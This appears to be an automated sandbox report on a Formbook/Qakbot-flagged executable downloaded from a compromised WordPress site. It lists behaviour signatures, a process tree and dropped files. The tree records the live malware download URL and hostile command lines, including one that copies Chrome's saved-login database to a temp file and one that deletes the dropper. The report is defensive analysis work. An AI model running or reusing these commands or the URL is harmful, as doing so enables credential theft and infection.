Analysis

  • max time kernel: 146s
  • max time network: 148s
  • platform: windows10_x64
  • resource: win10
  • submitted: 07-07-2020 00:47

General

  • Target

    http://www.kyrosmaritime.com/wp-admin/new%20crypt.exe

  • Sample

    200707-3dd9rxm2js

Malware Config

Signatures

  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Executes dropped EXE (2 IoCs)
  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Adds Run entry to start application (2 TTPs, 2 IoCs)
  • Suspicious use of SetWindowsHookEx (4 IoCs)
  • Suspicious use of SetThreadContext (5 IoCs)
  • Checks whether UAC is enabled (2 IoCs)
  • Suspicious behavior: MapViewOfSection (12 IoCs)
  • Suspicious use of AdjustPrivilegeToken (16 IoCs)
  • Modifies Internet Explorer settings (1 TTPs, 54 IoCs)
  • Formbook

    Formbook is a data-stealing malware family.

  • Drops file in Program Files directory (1 IoCs)
  • Suspicious use of WriteProcessMemory (21 IoCs)
  • Suspicious use of FindShellTrayWindow (3 IoCs)
  • Suspicious behavior: EnumeratesProcesses (48 IoCs)
  • Modifies system certificate store (8 IoCs)

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.kyrosmaritime.com/wp-admin/new%20crypt.exe
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Checks whether UAC is enabled
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      • Suspicious use of FindShellTrayWindow
      • Modifies system certificate store
      PID:3588
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3588 CREDAT:82945 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Checks whether UAC is enabled
        • Modifies Internet Explorer settings
        PID:3856
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe
        "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:1908
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe
          "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:2964
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
      PID:3980
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
      PID:1864
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
      PID:3984
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
      PID:3436
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
      PID:2828
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
      PID:736
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\SysWOW64\netsh.exe"
      2⤵
      • Adds Run entry to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Modifies Internet Explorer settings
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      PID:3992
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"
        3⤵
        PID:2644
      • C:\Windows\SysWOW64\cmd.exe
        /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
        3⤵
        PID:2184
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
        PID:740

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe.i9fdrx5.partial
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\2QUNAUWS.cookie
  • C:\Users\Admin\AppData\Local\Temp\DB1
  • C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg
  • C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini
  • C:\Users\Admin\AppData\Roaming\057903T3\057logrg.ini
  • C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini
  • C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini
  • memory/740-22-0x0000000000000000-mapping.dmp
  • memory/740-23-0x00007FF73E940000-0x00007FF73E9D3000-memory.dmp (Filesize: 588KB)
  • memory/740-25-0x00007FF73E940000-0x00007FF73E9D3000-memory.dmp (Filesize: 588KB)
  • memory/740-24-0x00007FF73E940000-0x00007FF73E9D3000-memory.dmp (Filesize: 588KB)
  • memory/1908-2-0x0000000000000000-mapping.dmp
  • memory/2184-19-0x0000000000000000-mapping.dmp
  • memory/2644-10-0x0000000000000000-mapping.dmp
  • memory/2964-5-0x000000000041E200-mapping.dmp
  • memory/2964-4-0x0000000000400000-0x000000000042D000-memory.dmp (Filesize: 180KB)
  • memory/3588-15-0x000001E3683D1000-0x000001E368414000-memory.dmp (Filesize: 268KB)
  • memory/3856-17-0x00000000000000B8-mapping.dmp
  • memory/3856-0-0x0000000000000000-mapping.dmp
  • memory/3992-21-0x0000000006960000-0x0000000006ADC000-memory.dmp (Filesize: 1.5MB)
  • memory/3992-16-0x0000000005CD0000-0x0000000005E23000-memory.dmp (Filesize: 1.3MB)
  • memory/3992-14-0x0000000005CD0000-0x0000000005E23000-memory.dmp (Filesize: 1.3MB)
  • memory/3992-9-0x00000000010E0000-0x00000000010FE000-memory.dmp (Filesize: 120KB)
  • memory/3992-8-0x00000000010E0000-0x00000000010FE000-memory.dmp (Filesize: 120KB)
  • memory/3992-7-0x0000000000000000-mapping.dmp